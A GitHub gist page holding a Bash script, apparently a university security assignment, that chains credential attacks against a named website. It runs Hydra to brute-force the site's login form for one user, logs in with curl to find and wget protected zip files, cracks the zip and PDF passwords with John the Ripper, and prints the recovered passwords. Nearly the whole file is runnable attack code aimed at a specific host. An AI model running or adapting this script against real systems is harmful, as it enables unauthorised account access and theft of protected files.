Created
April 28, 2014 05:33
-
-
Save danielrobleM/11362530 to your computer and use it in GitHub Desktop.
Tarea de Seguridad Profesor 2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Daniel Roble - Cristobal zuñiga | |
| # Se ha utilizado john-1.7.9-jumbo-7. | |
| # se debe ejecutar este bash en un directorio donde se encuentre la carpeta de john y este este instalado previamente. | |
| # Este Bash, permite encontrar la contraseña del usuario 112,utilizando Hydra, luego descarga los archivos disponibles para ese usuario, en una carpeta | |
| # llamado zip, luego con JTR descifra las claves y descomprime los archivos en el directorio donde se ejecuto el bash. | |
| # Despues se eliminan todos los archivos,excepto los pdf descargados. | |
| # Por consola se muestran las claves de JTR de el zip y en ultima instancia del(los) pdf. | |
| # El diccionario utilizado se encuentra disponible en :http://cl.ly/text/2i3K2W3s2y1d | |
| if [ -e john-1.7.9-jumbo-7/run/john.pot ]; then | |
| rm john-1.7.9-jumbo-7/run/john.pot | |
| fi | |
| hydra -l 112 -P pass.txt gestionfacturas.site50.net http-form-post "/usuario.php:user=^USER^&pass=^PASS^:incorrectas" > a.txt | |
| user=`cat a.txt | grep login:|awk '{print $5}'` | |
| pass=`cat a.txt | grep login:|awk '{print $7}'` | |
| # echo $user | |
| # echo $pass | |
| # echo "curl -XPOST "http://gestionfacturas.site50.net/usuario.php" -d 'user=$user' -d 'pass=$pass' " | |
| urlForWget=`curl -s -XPOST "http://gestionfacturas.site50.net/usuario.php" -d 'user='"$user"'' -d 'pass='"$pass"'' | grep "form action="|awk '{print $2}'| sed s/action=\"// | sed s/\"\>//` | |
| # echo $urlForWget | |
| # Se descarga el archivo | |
| if [ ! -d zip ]; then | |
| mkdir zip | |
| fi | |
| cd zip | |
| wget -q $urlForWget | |
| cd .. | |
| #Se descomprime | |
| for f in zip/*; do | |
| john-1.7.9-jumbo-7/run/zip2john $f >hash_zip | |
| ./john-1.7.9-jumbo-7/run/john -w:pass.txt hash_zip>/dev/null | |
| passZIP=`cat john-1.7.9-jumbo-7/run/john.pot|sed 's/:/ /' | awk '{print $2}'` | |
| # echo "$passZIP" | |
| # echo "unzip -P $passZIP $f" | |
| unzip -q -P $passZIP $f | |
| done | |
| # Ahora encuentra la clave de pdf | |
| rm john-1.7.9-jumbo-7/run/john.pot | |
| for pdf in *.pdf; do | |
| echo $pdf | |
| john-1.7.9-jumbo-7/run/pdf2john $pdf >hash_pdf | |
| ./john-1.7.9-jumbo-7/run/john -w:pass.txt hash_pdf>/dev/null | |
| passPDF=`cat john-1.7.9-jumbo-7/run/john.pot|sed 's/:/ /' | awk '{print $2}'` | |
| echo " Pass PDF :"$passPDF | |
| done | |
| # eliminado archivos innecesarios | |
| rm john-1.7.9-jumbo-7/run/john.pot | |
| rm -rf zip | |
| rm a.txt | |
| rm hash_pdf | |
| rm hash_zip |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment